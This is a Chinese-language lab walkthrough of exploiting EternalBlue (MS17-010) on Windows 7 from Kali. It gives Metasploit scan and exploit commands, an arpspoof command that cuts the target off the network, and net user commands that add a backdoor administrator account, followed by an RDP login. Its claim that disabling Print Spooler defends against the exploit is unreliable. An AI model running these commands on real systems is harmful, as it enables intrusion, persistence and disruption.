赞
踩
“永恒之蓝”漏洞工具利用了windows7中c v e - 2 0 1 7 -0144漏洞。cve -2017-0144漏洞错误处理了网络传入的数据长度,导致复制数据时出现内存溢出。
溢出的数据覆盖了用于接收数据的内存区域指针,把合法地址修改成了系统保留区域(KI_USER_SHARED_DATA0xf fdf0000)的地址,导致后续发来的数据覆盖了系统保留区域。系统保留区域中存放了系统调用返回(SystemCallReturn)地址,从而在网络接收系统调用完成后会跳转到攻击者精心布置的代码中,使攻击者成功执行shellcode获得超级用户权限。
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币。
(1)确保在windows7关闭防火墙和自动更新。
(2)确保靶机(Windows系统)已开启,并连接到与Kali系统相同的网络。
(1)在攻击通过msfconsole命令打开msf功能
(2)搜索ms17-010脚本,使用ms17-010辅助功能,对靶机进行扫描,信息收集,配置靶机ip
(3)检测到可能存在永恒之蓝漏洞ms17-010
(1)切换到攻击模块,并查看配置项,配置靶机ip
(2)攻击靶机
(1)上传文件(使用照片代替bug程序)
(2)进行ARP断网攻击
(1)查看远程端口是否开启,如果没有开启就开启该端口
(2)创建新用户,并将其添加进管理员组
(1)使用Kali自带的远程连接工具进行连接xfreerdp
(1)找到windows7的Print Spooler服务,并禁用后,再进行攻击
(2)重新开启Print Spooler服务,再进行攻击
(1)将kali和windows7的网络配置,都配置成桥接模式,为了后面使他们在同一网段
(2)将windows7中进行设置,将系统自动更新和系统防火墙关闭,不关防火墙会出现,kali的IP地址ping不到windows7的IP地址
(3)查看windows7和kali的IP地址,查询靶机ip192.168.126.129,和攻击机ip192.168.126.130,并测试互连
ipconfig
Ping 192.168.126.129
(1)在攻击通过msfconsole命令打开msf功能,
msfconsole
(2)搜索ms17-010脚本,使用ms17-010辅助功能。
Search ms17-010
(3)对靶机进行扫描,信息收集,配置靶机IP,运行
Use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.126.129
run
Use exploit/windows/smb/ms17_010_eternalblue
进行攻击
Set rhosts 192.168.126.129
run
shell
(1)事先在kali准备图片,可直接上传至windows中(这里用图片代替漏洞程序或bug文件)
Upload /home/kali/Desktop/1.jpg c:\\
可以看到已经上传过去了
(2)进行ARP断网攻击,查看网关,这里win7的网关是192.168.126.2
Arpspoof -I eht0 -t 192.168.126.129 192.168.126.2
这里看到win7中,已经断网了
netstat -an
Netstat -an|find *3389*
net user hack 123123 /add
net localgroup administrators hack /add
(1)使用Kali自带的远程连接工具进行连接xfreerdp
xfreerdp/u:hack/p:123123/v:192.168.126.129/size:80%
在这里还能看到之前上传的图片
(1)找到windows7的Print Spooler服务,并禁用后,再进行攻击
Services.msc
(2)将Print Spooler服务关闭,重新攻击,可以看出禁用之后就攻击不进去了FAIL,说明Windows 7禁用Print Spooler服务后,对于“永恒之蓝”漏洞的攻击确实能提供一定的防御效果。
(3)重新开启Print Spooler服务,再进行攻击(重新启用服务后,一定得重启windows7,不然还是攻击不进去,注意!!!)
重新攻击,看到又攻击进去了。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。